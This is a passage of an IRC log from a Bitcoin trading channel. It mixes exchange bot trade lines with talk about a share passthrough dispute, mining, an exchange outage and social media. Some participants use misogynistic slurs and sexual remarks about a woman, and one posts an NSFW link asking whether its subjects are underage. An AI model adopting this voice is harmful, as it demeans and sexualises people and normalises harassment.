0.00053173 = 3.0208 BTC [+] Dec 07 20:08:17 [MPEX] [S.MPOE] 5698 @ 0.00053182 = 3.0303 BTC [+] Dec 07 20:12:14 [MPEX] [S.MPOE] 4321 @ 0.00053152 = 2.2967 BTC [-] Dec 07 20:12:15 [MPEX] [S.MPOE] 6551 @ 0.00053182 = 3.484 BTC [+] Dec 07 20:13:59 [MPEX] [S.MPOE] 6500 @ 0.00053182 = 3.4568 BTC [+] Dec 07 20:16:21 EskimoBob yer talkin nonsense. Dec 07 20:20:14 if f.giga.etf is supposed to have some value, why nobody asked mircea to arrange buyback on december 1st? << why did it trade 3 days out of 30 for the 30 days BEFORE the announcement moreover. Dec 07 20:21:26 he bought shares of giga from giga direct? or on glbse << i bought bonds before the glbse ipo. they were transformed into glbse shares when giga decided later to put up with nefario's bs. i didn't want to, but i didn't make a huge point out of it either because at the time nefario hadn't yet quite shown himself for the huge cock he was/i didn't know better. Dec 07 20:22:16 ahhh Dec 07 20:22:28 then Dec 07 20:22:29 well mircea_popescu claims that "he always stated" that he intended the passthrough to be zero work/maintenance << should i quote ? Dec 07 20:22:40 but were your shares listed within glbse? Dec 07 20:22:59 and 'assigned' to you? Dec 07 20:23:06 or were those outside of/beyond ? Dec 07 20:23:47 [MPEX] [S.MPOE] 7051 @ 0.00053182 = 3.7499 BTC [+] Dec 07 20:23:48 [MPEX] [S.MPOE] 11825 @ 0.00053182 = 6.2888 BTC [+] Dec 07 20:24:09 pigeons: he removed all records of the asset from accounts though, is my udnerstanding << you srsly should read that 3 hour discussion. the shares were removed from current holdings. all historical info is still there, and also here, on the twitter feed, etc. Dec 07 20:24:10 i.e. was giga paying you divs seperately ? Dec 07 20:24:31 then I was very wrong. :) Dec 07 20:24:44 yeah i figured originally i would have an easier time getting GIGA divdends from MP than from nefario if GLBSE went south << this would be true. however, glbse going south + giga going taxid/etc is a different story. Dec 07 20:25:52 ahhhhh Dec 07 20:26:05 good morning mr giga :P Dec 07 20:26:06 maybe you could explain a bit further Dec 07 20:26:07 Ukto no, theywere on glbse. Dec 07 20:26:13 ah, okay Dec 07 20:26:17 good afternoon Ukto Dec 07 20:26:24 everyone's pre-glbse ipo stuff was moved on glbse Dec 07 20:26:26 guess it is afternoon now isnt it Dec 07 20:26:34 it seemed logical at the time, simplify everyone's maintenance of it. Dec 07 20:26:38 some parts of the world ;) Dec 07 20:26:53 also, it seemed friendlier to smalltimers, as in, not have to require minimum x hundred btc investment. Dec 07 20:27:10 the problem with being friendly to small timers is that then you end up stuck with a horde of very silly people. Dec 07 20:27:44 so basically, it boils down to, you did the passthrough, told everyone you had 0 plans to do anything that requires any actual time or effort, good luck have fun. now shit hit the fan, and your sticking to what your siad since gigavps wants tax docs/id etc that you never agreed to provide should they be requested. right? Dec 07 20:28:33 regardless of any potential share value Dec 07 20:28:35 something like that. Dec 07 20:28:43 potential or not Dec 07 20:28:44 even Dec 07 20:28:50 well, not regardless. if the stuff giga does ends up having a value in fact Dec 07 20:29:00 giga.etf people can whine at me for it. Dec 07 20:29:05 but atm, it's nothing yet. Dec 07 20:29:13 and gigavps, I take it, your stuck not able to give out anything unless mircea_popescu provides said documentation right? Dec 07 20:29:30 correct Dec 07 20:29:32 then it is a stalemate. Dec 07 20:29:40 dude, looky : Dec 07 20:29:54 giga finally is done with his process sometime. say january. Dec 07 20:30:08 issues a 0.15 btc payment per share. Dec 07 20:30:50 etf guy emails me going listen! i had 1000 etf shares. giga paid 0.15 btc! I should get something! Dec 07 20:30:51 people can bitch and whine at mp ALL they want, but if it was made clear that he had no responsibility to do any effort towrads the actual shares, then its up to thsoe people to seek whatever based on their own views. end of story Dec 07 20:31:06 he's probably going to get something. Dec 07 20:31:22 mircea_popescu: what if gigavps begins normal div payouts regularly? Dec 07 20:31:28 and you havent 'claimed' ? Dec 07 20:31:34 would you continue to pay out divs out of your pocket? Dec 07 20:31:40 alternatively, guy goes "here's a signed statement of no further claims, pay me X". if x is reasonable he'll also get it. Dec 07 20:31:41 etc. Dec 07 20:31:44 just curious :) Dec 07 20:31:57 all this is very fucking c ommon and veryfucking sane, except for people that really have no idea howfinance works. Dec 07 20:32:22 and people blowing up and loosing their mind and getting attiudes Dec 07 20:32:25 Ukto i doubt it makes much sense for giga to pay dividends "normally". i would expect he makes some sort of final settlement. Dec 07 20:32:35 [MPEX] [S.MPOE] 11850 @ 0.00053043 = 6.2856 BTC [-] Dec 07 20:32:41 i don't intend to make any more than one payment to claimants, which'd be final and negotiated. Dec 07 20:32:53 gigavps: you were planning to shut down, right? someone mentioend earlier you wanted to continue? But that did nto soudn right to me Dec 07 20:33:04 it's impractical to keep fiddling with the shit forever. Dec 07 20:33:06 *cant type, sorry Dec 07 20:33:16 Ukto if i was going to shut down, i wouldn't be going through all of this mess Dec 07 20:33:25 ?! Dec 07 20:33:27 ahhh alright Dec 07 20:33:32 how'd you pay if you were going to shut down ? Dec 07 20:34:08 mircea_popescu we don't have to worry about that because i'm NOT SHUTTING DOWN Dec 07 20:34:10 i thought the entire problem was you didn't have a way to identify owners that's reliable Dec 07 20:34:21 mkay. Dec 07 20:34:32 this is an odd development lol. Dec 07 20:34:35 so he plans to contiune (at some point) to pay dividends and get back to business as usual Dec 07 20:34:43 is the US, it is mandatory to keep records of who you are doing business with Dec 07 20:34:44 see what happens when we talk things through? :) Dec 07 20:34:44 you seriously are going to be paying weekly btc after your claims are complete ?! Dec 07 20:35:02 mircea_popescu yes Dec 07 20:35:11 Ukto not like i'm nopt here daily an' talking things. Dec 07 20:35:15 wtf did you think i was going to do Dec 07 20:35:20 no, but sometimes a 3rd person helps alot Dec 07 20:35:26 (if that person is trying to work things out.) Dec 07 20:35:27 gigavps da fuck. won't that even cost more than the payments to administer ?! Dec 07 20:35:42 i thought you'll go here is a final payment offer, lala. Dec 07 20:35:45 yes, hes trying to do it as "right" as possible Dec 07 20:35:53 even if it costs outof his pocket Dec 07 20:35:55 giavps 2 legit Dec 07 20:35:55 LOL Dec 07 20:36:01 so legit he hurts himself Dec 07 20:36:02 it's how something lik this is usually unwound. Dec 07 20:36:02 thats been the whoel odeal that ppl have been confused on I think Dec 07 20:36:05 well, maybe you should ask me what i'm doing Dec 07 20:36:24 instead of deciding for me in your head Dec 07 20:36:32 gigavps: well, now that things are working out, lets play nice :P Dec 07 20:36:34 gigavps i did notice you never actualyl said what you were doing with the claims once complete, so i figure it's because it's the obvious thing Dec 07 20:36:38 and didn't care to stir the pot. Dec 07 20:36:40 lets not start a new fued :P Dec 07 20:36:40 i am playing nice Dec 07 20:36:41 sounds like a classic communication breakdown Dec 07 20:36:52 jcpham: exactly. Dec 07 20:36:55 no harm no foul Dec 07 20:37:14 now _everyone_ can take teh knifes off of everyones throats, and relax a bit Dec 07 20:37:21 my wife does say that my style of communication is to offer less and wait for questions Dec 07 20:37:28 mine too Dec 07 20:37:33 i'm no messenger Dec 07 20:37:51 i'm not really fond of people who can talk for days on end.... Dec 07 20:38:08 like Ukto? Dec 07 20:38:10 sure Dec 07 20:38:17 so you are going to pay btc weekly ? Dec 07 20:38:19 defenitely Dec 07 20:38:23 ;) Dec 07 20:38:42 hey, if I can help someone with my annoyance, so be it :P Dec 07 20:38:56 mircea_popescu i'm writing the software to handle this now.... Dec 07 20:38:57 i gotta see this thing. Dec 07 20:39:19 but wtf i mean suppose someone sends notice of non payment Dec 07 20:39:20 gigavps: use notepad.exe Dec 07 20:39:31 now that you're all in written form. what do you do, explain the court that you in fact DID pay Dec 07 20:39:36 it was just this btc thingee ? Dec 07 20:40:48 jcpham: LOL Dec 07 20:40:58 jcpham i love notepad.exe Dec 07 20:41:08 best programmer Dec 07 20:41:10 but i use sublime text for the most part Dec 07 20:41:18 nah Dec 07 20:41:18 [MPEX] [S.DICE] 1101 @ 0.00331829 = 3.6534 BTC [-] Dec 07 20:41:19 [MPEX] [S.DICE] 2099 @ 0.0033 = 6.9267 BTC [-] Dec 07 20:41:24 just use excel to store all your data and track it Dec 07 20:41:26 its teh best! :P Dec 07 20:41:39 mircea_popescu the contract is for bitcoins, that is not changing Dec 07 20:41:43 access database Dec 07 20:41:44 don Dec 07 20:41:47 't lie Dec 07 20:41:48 ouch Dec 07 20:42:00 mariadb Dec 07 20:42:01 heh, apples filemaker pro :P Dec 07 20:42:01 multi-user access database Dec 07 20:42:03 even better Dec 07 20:42:12 oooh Dec 07 20:42:15 Fox! :P Dec 07 20:42:49 I'm not really going to be happy about bitcoin until I have the balling asics Dec 07 20:43:00 prolly next year that. Dec 07 20:43:04 gpu mining is for the birds Dec 07 20:43:18 agreed Dec 07 20:43:20 thank god for the shares i have left at coinlab Dec 07 20:43:22 i turned my gpu off a few days ago Dec 07 20:43:27 thinking about putting it on ltc for amusement Dec 07 20:43:29 that's like 140% Dec 07 20:43:56 jcpham: how did you get all those shares at coinlab ? >:P Dec 07 20:44:19 hamsters. Dec 07 20:44:32 i gamed the shit out of their PPS Dec 07 20:44:36 lol Dec 07 20:44:40 i think i got the whole hour of 199% Dec 07 20:44:44 a few weeks back Dec 07 20:45:36 is this like a sort of pool hopping ? Dec 07 20:45:59 hashpower.com is sortof like gpumax.com Dec 07 20:46:18 in that you can buy other people's rigs for the highest price Dec 07 20:46:20 per share Dec 07 20:46:44 so if I can buy at 115% and mine ona pool paying 120% Dec 07 20:46:48 it is profitable Dec 07 20:47:10 coinlab is lucky they came around after gpumax Dec 07 20:47:19 you mean, you are lucky? :P Dec 07 20:47:29 or that they get to pay you more? Dec 07 20:47:29 :P Dec 07 20:47:46 if hashpower was 1TH/s Dec 07 20:47:50 i'd have more shares Dec 07 20:48:19 probably break their pool though Dec 07 20:48:28 it might soon enough Dec 07 20:48:39 working on vardiff atm Dec 07 20:48:44 neat Dec 07 20:49:00 also, weex no longer requires invites. :) Dec 07 20:49:13 its now open-beta lol Dec 07 20:49:17 hashpower->weex->my wallet is instant btw Dec 07 20:49:20 flawless even Dec 07 20:49:35 and weex min withdraw is 0.1btc now Dec 07 20:50:28 https://bitcointalk.org/index.php?topic=78638.msg1384935#msg1384935 Dec 07 20:50:30 I will prolly setup a btc auto-withdraw thing for both HP and weex at somepoint. Dec 07 20:50:34 might be an xmas gift Dec 07 20:50:39 that would be nice Dec 07 20:50:46 then i could forget about my miners Dec 07 21:06:08 [MPEX] [S.MPOE] 4321 @ 0.00052706 = 2.2774 BTC [-] Dec 07 21:06:10 [MPEX] [S.MPOE] 12979 @ 0.000527 = 6.8399 BTC [-] Dec 07 21:21:51 Ok, https://bitcointalk.org/index.php?topic=74216.msg1385017#msg1385017 Dec 07 21:25:42 good luck with it Dec 07 21:40:11 mircea_popescu: So, didn't you really know that gigavps would be continuing payments? Dec 07 21:40:29 [MPEX] [S.MPOE] 4321 @ 0.00052718 = 2.2779 BTC [+] Dec 07 21:40:31 [MPEX] [S.MPOE] 28329 @ 0.000527 = 14.9294 BTC [-] Dec 07 21:40:43 afaik he never said that specifically until tonight. Dec 07 21:41:42 Well, I knew it, that's way I was still interested... Dec 07 21:41:53 i'm not sure why i would be paying all of this money if i didn't want to continue. but i digress Dec 07 21:42:03 It was in his thread IIRC? Dec 07 21:43:58 gigavps well, clean closing comes to mind. Dec 07 21:44:17 rdponticelli gimme a quote ? it's possible girl might have missed it. Dec 07 21:46:12 I wouldn't bother for 8 or 9 btc, but it's the link that's worthwhile Dec 07 21:46:58 rdponticelli what we do, even if for 8 or 9 btc, has the value of creating precedent Dec 07 21:47:08 so in general it's worth arguing things to their ends. Dec 07 21:47:19 mircea_popescu: I would have to search for the quote... Dec 07 21:49:14 But I clearly understood the continuity from what I gathered from the thread... Dec 07 21:50:19 well mind you, what you understood and what it says may be different things. Dec 07 21:50:27 Well, we are still arguing... Dec 07 21:50:59 There's plenty of time Dec 07 21:51:02 mpex website down? Dec 07 21:51:13 yeah datacenter doesn't ping. Dec 07 21:51:28 OMGSEC Dec 07 21:51:50 Yeah, may be, but everybody else seems to have understood the same Dec 07 21:51:55 lol Dec 07 21:52:48 209.51.137.26 is ded Dec 07 21:53:42 It's that's so difficult to filter out the shit on that forum... Dec 07 21:53:52 rdponticelli you're telling me ? Dec 07 21:54:58 mircea_popescu: I'm just telling... Dec 07 21:55:05 :) Dec 07 21:55:13 *Saying Dec 07 21:55:21 im just agreeing lol. srsly, wouldn't surprise me if the girl missed out something, jsut on sheer volume Dec 07 21:55:30 mircea_popescu, all my mpex commands time out :S Dec 07 21:55:45 other can do STAT without problem? Dec 07 21:55:56 *others Dec 07 21:56:05 read up ? Dec 07 21:56:11 dc just vanished am inute ago. Dec 07 21:56:23 ah Dec 07 21:56:32 its back Dec 07 21:56:36 yes Dec 07 21:57:01 errr Dec 07 21:57:02 or not Dec 07 21:57:15 yeah. was like... tech picked up, person said hi tech said "it's back" Dec 07 21:57:20 what again ? Dec 07 21:57:27 ahaha wtf. Dec 07 21:57:36 down again Dec 07 21:58:16 a well im giving it five. Dec 07 21:59:44 its just superslow Dec 07 22:00:16 my bots finally DOSed it :p Dec 07 22:01:10 no, one router fried. they say be ~15. Dec 07 22:07:27 lol Dec 07 22:08:58 [MPEX] [S.BVPS] 25121 @ 0.00300001 = 75.3633 BTC [-] Dec 07 22:10:36 ok, s²cm begins paying out as soonits machine syncs with the blockchain Dec 07 22:10:49 *as soon as its Dec 07 22:11:14 ahh this is nice Dec 07 22:11:21 what is s²cm Dec 07 22:11:22 i like people who say ~15 and then it's 9 Dec 07 22:11:33 [MPEX] [S.MPOE] 3200 @ 0.00052885 = 1.6923 BTC [+] Dec 07 22:11:42 Bugpowder: a former glbse asset Dec 07 22:11:59 it was smickles and iirc splater's trading bot Dec 07 22:12:20 Azelphur: did the netsplit cause you to miss this: https://bitcointalk.org/index.php?topic=74216.msg1385017#msg1385017 Dec 07 22:12:29 [MPEX] [O.BTCUSD.C140T] 1000 @ 0.10186609 = 101.8661 BTC [-] Dec 07 22:12:36 yeah Azelphur you should hurry Dec 07 22:12:51 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.13567008 = 135.6701 BTC [-] Dec 07 22:12:56 lol, "while supplies last" Dec 07 22:12:59 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16560208 = 165.6021 BTC [-] Dec 07 22:13:01 haha Dec 07 22:13:02 ooo Dec 07 22:13:54 smickles for my curiosity, what repay scheme do you use ? everyone who claims % equal to what you have liquid + settlement/final payment once 100% liquidates ? Dec 07 22:14:53 yeah, since we have not liquidate 100% of the assets yet, everyone gets an equal share of btc on hand, then an equal share of the btc from each sale as they occur Dec 07 22:15:20 o, like that ? Dec 07 22:15:32 mircea_popescu: this cunt you hired to do your PR is kinda stupid. Possibly both of you are clueless and she is the fool who is just posting that nonsense you have told her to write Dec 07 22:15:44 i like her boobs Dec 07 22:15:45 er, equal share, being their proportion according to how many shares they had Dec 07 22:15:46 EskimoBob what is this about ? Dec 07 22:15:55 ask her Dec 07 22:16:20 lmao. you are trying to hide behind the skirts of MY pr ? Dec 07 22:16:22 get your own. Dec 07 22:16:40 ? Dec 07 22:16:42 https://bitcointalk.org/index.php?action=profile;u=52741;sa=showPosts Dec 07 22:16:56 i think she's abrasive too mircea, put a muzzel on her Dec 07 22:17:11 but boobs Dec 07 22:17:16 wouldn't she look great in a muzzle... Dec 07 22:17:22 i bet Dec 07 22:17:23 but that aside, abrasive is needed on btctalk. Dec 07 22:17:26 jcpham: she is just perfect for mircea_popescu Dec 07 22:17:41 i actually like how she drops the hammer on people on btctalk Dec 07 22:17:46 i do too Dec 07 22:17:51 i used the word abrasive Dec 07 22:17:58 which isn't *that* bad Dec 07 22:17:59 If i was on there, I would +1 many posts. Dec 07 22:18:04 abraded sounds sorta like something to do with bride Dec 07 22:18:40 abrasives are good, acetone, for instance, is greate at removing nail polish Dec 07 22:18:42 i already have 1 bride, dont need more Dec 07 22:18:50 does she abride you ? Dec 07 22:19:23 Ukto: you do not want that sociopath :) Dec 07 22:19:29 ROFLOL Dec 07 22:19:47 o, also, to remind everyone : http://trilema.com/2012/the-mpex-rota/ Dec 07 22:19:51 first rolls close in ~ a week Dec 07 22:20:11 fuck you and your rota, mircea_popescu. Honestly Dec 07 22:20:36 at the rate you are going right now, you are probably the first asshole in front of that toy court Dec 07 22:20:40 toning down on the condescending remarks would help boobs mcghee Dec 07 22:20:40 why are you so angry, anyway ? Dec 07 22:20:46 i doubt she needs friends though Dec 07 22:20:48 lol :) Dec 07 22:21:26 I am not angry at all. Dec 07 22:21:33 whats the diference between a # and a @ on twatter? Dec 07 22:21:39 EskimoBob: I'd like to thank you for causing me to be quoted so often :) Dec 07 22:21:42 one is a person Dec 07 22:21:43 # sends t a chanel Dec 07 22:21:46 on is a hashtag Dec 07 22:21:47 @ to a person Dec 07 22:22:01 hashtags are like subject links Dec 07 22:22:04 jcpham: thanks capt, obvious Dec 07 22:22:13 so I would create a channel ? Dec 07 22:22:14 0,o Dec 07 22:22:15 omg we were only trying to halp. Dec 07 22:22:22 so #ukto in every tweet Dec 07 22:22:24 ukto why'd you be on twitter ? Dec 07 22:22:27 would make it easy to search for you Dec 07 22:22:34 or anyone talking about you Dec 07 22:22:37 or that subject Dec 07 22:22:40 mircea_popescu: for bitfunder Dec 07 22:22:43 for trade history Dec 07 22:22:54 a a Dec 07 22:22:55 MPEx ‏@MPEx1 Dec 07 22:22:55 1`000 O.BTCUSD.C120T @ 0.16560208BTC = 165.60208000BTC (= 2`200.85 USD). 20 #trade #bitcoin #btc #options Dec 07 22:23:02 im not sure why i use those, tbh. Dec 07 22:23:12 i dump spam on it Dec 07 22:23:15 that's about it Dec 07 22:23:25 twitter is an excellent professional tool Dec 07 22:23:30 fluffygrrl = MPOE-PR ... nice! Dec 07 22:23:32 every few months i log in and respong to smickles Dec 07 22:23:56 heh, quarterly, iirc Dec 07 22:23:58 its the ultimate customized newsfeed, with real itme Dec 07 22:24:00 Bugpowder what profession ? Dec 07 22:24:01 time info Dec 07 22:24:02 yes quarterly Dec 07 22:24:07 Bugpowder: there is nothing professional about twatter Dec 07 22:24:10 great for science Dec 07 22:24:17 probably Dec 07 22:24:27 if you study human stupidity Dec 07 22:24:27 great for marketing people, tech people Dec 07 22:24:41 great for professional atheletes Dec 07 22:24:47 i had a pretty large following, never quite saw the usefulness of it. Dec 07 22:24:50 to "build their brand" Dec 07 22:25:00 spam mircea_popescu Dec 07 22:25:04 i guess. Dec 07 22:25:06 sure, if you believe in 140 char drivel and # tags. No thanks Dec 07 22:25:17 The usefulness is not from who follows you so much as the quality of who you follow Dec 07 22:25:22 twitter is about information Dec 07 22:25:26 but it stresses me way out Dec 07 22:25:28 http://twitter.com/mircea_popescu << pretty much have it set as a sort of rss feed of my blog atm Dec 07 22:25:41 but a year or two ago i used to be active. i guess its great if you're trying to hook up Dec 07 22:25:46 basically my twitter feed is a stream of a bunch of interesting links to things I care about, sprinkled with snarky commentary Dec 07 22:25:59 Bugpowder sort of like popurls / delicious ? Dec 07 22:26:06 In the last year, serious science people have really gotten on board Dec 07 22:26:11 I dunno about that stuff Dec 07 22:26:28 a ok well maybe that explains it. Dec 07 22:26:37 this allows you to have a dialogue with important people in your field and others you are interested in Dec 07 22:26:42 in a quick way Dec 07 22:26:48 honestly, i much prefer irc. just the logging alone. twitter sucks for looking in the history. Dec 07 22:27:01 and im a history-type. even newspapers, i buy today, read in 6 months. or a year. Dec 07 22:27:06 yeah but IRC is limited in the scope and is a timesuck Dec 07 22:27:13 twitter is quick Dec 07 22:27:17 mircea_popescu: twiter is like rss, but shit Dec 07 22:27:28 rss Dec 07 22:27:30 i never got into rss either Dec 07 22:27:37 is a reasonable comparison, but its not shit. Dec 07 22:27:58 its much better than rss, because the links are screened by real people for content quality Dec 07 22:28:15 as long as you follow people that don't post stupid shit Dec 07 22:28:20 what is mpex hosted on a bitvps now or something? Dec 07 22:28:27 but instead focus on good stuff. Dec 07 22:28:44 ANyway, I like it and find it useful. Dec 07 22:28:45 pigeons not afaik ? Dec 07 22:28:59 oh i guess not since it came back up quickly Dec 07 22:29:01 it's like how facebook is like having your own website, but shit Dec 07 22:29:02 lmao Dec 07 22:29:26 smickles i guess if he has a tight knit circle and they use it, its as good as the circle Dec 07 22:29:35 pigeons HURR DURR Dec 07 22:29:51 pigeons in its defense, it's the first time it was down in like six months. Dec 07 22:30:06 facebook is for friends and bullshit Dec 07 22:30:08 pigeons: huh, bitvps went down? i'm irsiing from a bitvps server Dec 07 22:30:23 pigeons has jokes smickles Dec 07 22:30:29 oh Dec 07 22:30:36 tip your waitress Dec 07 22:30:53 he saw mpex being down in the backlog and wet his pants. then saw it came back up. stuck with sticky fluid on loins. Dec 07 22:31:34 is that bullshit show friends still going ? Dec 07 22:31:43 no Dec 07 22:31:48 where the fuck are you from mircea_popescu Dec 07 22:31:49 only in syndication of reruns Dec 07 22:31:50 aww, Dec 07 22:31:52 oh right romania Dec 07 22:32:19 are you telling me Frineds isn't playing every weeknight on TBS in .ro? Dec 07 22:32:28 jcpham man, my only exposure to it was the one time i was picking up this chick. i was with some other dude, she was with like 3-4 friends of hers. and they were watching... you guessed it... Dec 07 22:32:44 so this other guy pointed out that show'd be great to watch when they're all like 48 or something. Dec 07 22:32:54 which... i can see the point lol. Dec 07 22:32:59 nah Dec 07 22:33:03 that shows sucks Dec 07 22:33:08 it'll never be good Dec 07 22:33:17 phoebe is stupid Dec 07 22:33:24 so is chandler and ross and rachel Dec 07 22:33:26 oh come on. unattractive old chicks and losery douches hanging around and kevetching ? Dec 07 22:33:27 riot! Dec 07 22:33:33 i don't remember the rest Dec 07 22:33:38 some of them fucked each other too Dec 07 22:33:45 but not while the show is running Dec 07 22:34:03 i think the show where they fuck is a different format Dec 07 22:34:10 life or reality or something like that Dec 07 22:34:17 put a half dozen bums in a vault. Dec 07 22:34:30 i don't want to see that show Dec 07 22:34:40 unless they are given drugs and weapons also Dec 07 22:34:48 speculums works. Dec 07 22:35:40 http://24.media.tumblr.com/tumblr_mcoor3YEGZ1r3khrvo1_1280.jpg << are these underage ? [NSFW/NSFUS/ETC] Dec 07 22:40:32 uh oh 90% stuff on http://www.reddit.com/r/bitcoin is about "bitcoin is becoming a bank" Dec 07 22:40:52 serious clicktivism or what Dec 07 22:41:40 *downvotes everything* Dec 07 22:41:53 i would guess that it's a political problem. amply illustrated in this exchange https://bitcointalk.org/index.php?topic=129337.msg1383274#msg1383274 Dec 07 22:42:27 basically, some geeky/nerdy/internet types found btc first. finance types found it second, are marginalising them and it hurts. Dec 07 22:42:32 sorta like you know, irl works. Dec 07 22:43:51 usagi is a licensed bank in japan Dec 07 22:44:20 it's easy if you're big in japan. Dec 07 22:44:29 yeah. and there's some banks livensed in nigeria on #bitcoin-otc Dec 07 22:44:34 *licensed Dec 07 22:51:47 http://www.youtube.com/watch?v=CTtf5s2HFkA Dec 07 23:01:46 Bitcoin is not becoming a bank... a minor bitcoin exchange is turning into... something. Dec 07 23:02:21 That doesn't, in itself, forces anything unto bitcoins. Dec 07 23:05:06 http://www.reddit.com/r/Bitcoinforum/comments/14gio9/banktechcom_is_bitcoin_becoming_a_bank/ Dec 07 23:05:09 Nice comment Dec 07 23:05:55 [MPEX] [S.MPOE] 5053 @ 0.00052796 = 2.6678 BTC [-] Dec 07 23:05:56 [MPEX] [S.MPOE] 4321 @ 0.00052702 = 2.2773 BTC [-] Dec 07 23:05:57 [MPEX] [S.MPOE] 6476 @ 0.000527 = 3.4129 BTC [-] Dec 07 23:08:58 And news anchor still fail at making accurate titles... http://www.guardian.co.uk/technology/2012/dec/07/virtual-currency-bitcoin-registers Dec 07 23:09:21 hmm, writer in this case, not anchor Dec 07 23:12:59 I didn't know Bitcoin had staffers or official representation. Or that the bitcoin network would now support bank transfers thanks to this bby becoming a registered payment service provider! Dec 07 23:14:28 Namjies it just goes to show the general population has not the first clue as to wtf is going on. Dec 07 23:14:41 it's real bad, show them a goose they swear they've seen a shoebox sorta thing. Dec 07 23:15:27 No, the general population has no clue as to how news are mostly rumors, not even researched facts. Dec 07 23:15:37 that too. Dec 07 23:15:51 They vaguely correlate with an actual event. How much it does is never known. Dec 07 23:15:51 but i meant, on the forum(s) and the like. Dec 07 23:16:03 Ah, indeed. Dec 07 23:16:20 http://static.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/10/3/1349274909354/A-screenshot-showing-a-Bi-006.jpg Dec 07 23:16:24 weak wallet screenshot Dec 07 23:16:26 that is https becoming an isp quote is really on point. wtf they know, random strings. Dec 07 23:20:40 http://i.imgur.com/zcLwz.png Dec 07 23:20:50 better wallet screenshot. inspires confidence Dec 07 23:20:58 4 txns is weak Dec 07 23:25:41 nope... I can read "and there's some banks livensed in nigeria on #bitcoin-otc" on it. Dec 07 23:26:35 [MPEX] [S.MPOE] 3143 @ 0.00052885 = 1.6622 BTC [+] Dec 07 23:26:36 [MPEX] [S.MPOE] 30220 @ 0.00053122 = 16.0535 BTC [+] Dec 07 23:27:33 Doesn't inspire confidence Dec 07 23:34:46 jcpham http://polimedia.us/dtng/c/src/135491604839.png even better. Dec 07 23:35:07 yes, yes it is Dec 07 23:35:33 [MPEX] [S.MPOE] 18588 @ 0.00053122 = 9.8743 BTC [+] Dec 07 23:35:34 [MPEX] [S.MPOE] 12975 @ 0.00053182 = 6.9004 BTC [+] Dec 07 23:35:36 [MPEX] [S.MPOE] 9737 @ 0.00053198 = 5.1799 BTC [+] Dec 07 23:36:18 i'd screenshot my wallet if I din't mostly use raw transactions now Dec 07 23:36:45 i can't wait until i hit 1000 txns Dec 07 23:37:18 i'm going to start playing around with multisig soon too *squee* Dec 07 23:40:32 im surprised anyone clicks my dtng links anymoar. Dec 07 23:41:26 and smickles you can get a gui wallet up to display any wallet.dat you wish. Dec 07 23:45:10 gui? Dec 07 23:45:20 on that machine? Dec 07 23:45:31 i'd have to install things :/ Dec 07 23:45:57 oooh, it tingles Dec 07 23:46:07 sick fuck. Dec 07 23:46:07 :P Dec 07 23:46:21 ya well it's why it took me ten minutes lol Dec 08 00:00:46 [MPEX] [S.MPOE] 15750 @ 0.000527 = 8.3003 BTC [-] Dec 08 00:09:31 https://openexchangerates.org/ Dec 08 00:13:30 [MPEX] [S.MPOE] 10005 @ 0.00053198 = 5.3225 BTC [+] Dec 08 00:13:32 [MPEX] [S.MPOE] 8700 @ 0.00053209 = 4.6292 BTC [+] Dec 08 00:13:33 [MPEX] [S.MPOE] 43084 @ 0.00053214 = 22.9267 BTC [+] Dec 08 00:13:34 [MPEX] [S.MPOE] 6911 @ 0.00053214 = 3.6776 BTC [+] Dec 08 00:14:31 smickles, here, some orchestrated air waves to give you heart for the task at hand. http://www.youtube.com/watch?v=b2MrK3rQYrA&list=PL2019F934A3AA4D1B&index=7 Dec 08 00:15:28 jesus i rank in google for conversation worthless Dec 08 00:17:19 Subscriptions require a PayPal account, but there is an option pay annually (non-recurring) where you can just use credit/debit card, without a PayPal account. Get in touch for details. Dec 08 00:17:23 Namjies : no btc ? shame on them Dec 08 00:17:47 What? Dec 08 00:19:56 o nm, was directed at pigeons Dec 08 00:20:56 yeah, i see coinbase on there, which i haven't tried, not a big hosted wallet fan Dec 08 00:33:15 [MPEX] [S.MPOE] 4321 @ 0.00053185 = 2.2981 BTC [-] Dec 08 00:33:16 [MPEX] [S.MPOE] 15416 @ 0.00053214 = 8.2035 BTC [+] Dec 08 01:11:57 [MPEX] [S.MPOE] 4321 @ 0.00052728 = 2.2784 BTC [-] Dec 08 01:11:58 [MPEX] [S.MPOE] 10129 @ 0.000527 = 5.338 BTC [-] Dec 08 01:23:15 kakobreklaaa ? Dec 08 01:23:41 system should be working acurately for twatter. https://twitter.com/BitFunder Dec 08 01:23:50 Once I get the new logo I need to stick it up Dec 08 01:26:17 trade:5@:Bit-Inc:1323127519 Dec 08 01:26:23 meaningless innit ? 5@what ? Dec 08 01:27:57 i believe the bot is here: https://github.com/nanotube/supybot-bitcoin-marketmonitor Dec 08 01:31:14 Namjies: thx :) Dec 08 01:32:20 lol, google ad: "Homeland Security Program - www.AMU.APUS.edu/HomelandSecurity - Expand Your World with a Degree in Homeland Security." Dec 08 01:35:46 that would make me think why i'm considered target audience Dec 08 01:36:45 weird Dec 08 01:36:48 not sure why it didnt have the price Dec 08 01:36:50 its there now Dec 08 01:37:24 the numbers in the end are timestamp? Dec 08 01:39:34 ^ Ukto Dec 08 01:41:03 jurov: well, back when I had graduated highschool, each branch of the military did attempt to recruit me into their intelegence divisions. ... until i told them that I had authority issues. maybe DHS didn't get the memo Dec 08 01:41:45 Ukto also, what do you think about implementing "Teh Unified Protocol" http://trilema.com/2012/towards-a-unified-exchange-protocol/ :P Dec 08 01:42:50 smickles, good for you Dec 08 01:42:52 [MPEX] [S.MPOE] 4321 @ 0.0005318 = 2.2979 BTC [+] Dec 08 01:42:53 [MPEX] [S.MPOE] 3879 @ 0.00053214 = 2.0642 BTC [+] Dec 08 01:44:47 jurov: timestamp at the end Dec 08 01:45:50 jurov: heh, you know, when I mentioned I was setting up for the twatter crap, etc, no one bothreed to throw it out then :P Dec 08 01:47:08 besides, is Mpex using it? https://twitter.com/MPEx1 Dec 08 01:48:26 [MPEX] [S.MPOE] 10579 @ 0.00053214 = 5.6295 BTC [+] Dec 08 01:49:19 i think teh protocol doesn't concern itself with twatter... but timestamp is nice addition Dec 08 01:50:00 besides, live.coinbr.com rather uses RSS and JSON directly from source Dec 08 01:54:04 "source" ? Dec 08 01:54:29 so I figured I to use glbse's basic layout so it would be easy fo kakobreklaaa to add Dec 08 01:54:47 the actual api-json listing will be quite a bit nicer Dec 08 01:55:07 "source" i mean polimedia.us Dec 08 01:55:15 missed the comments from psychoB earlier this morning Dec 08 01:55:29 ? Dec 08 01:55:43 jurov: so you just want the timestamp changed? hehe Dec 08 01:55:53 ? Dec 08 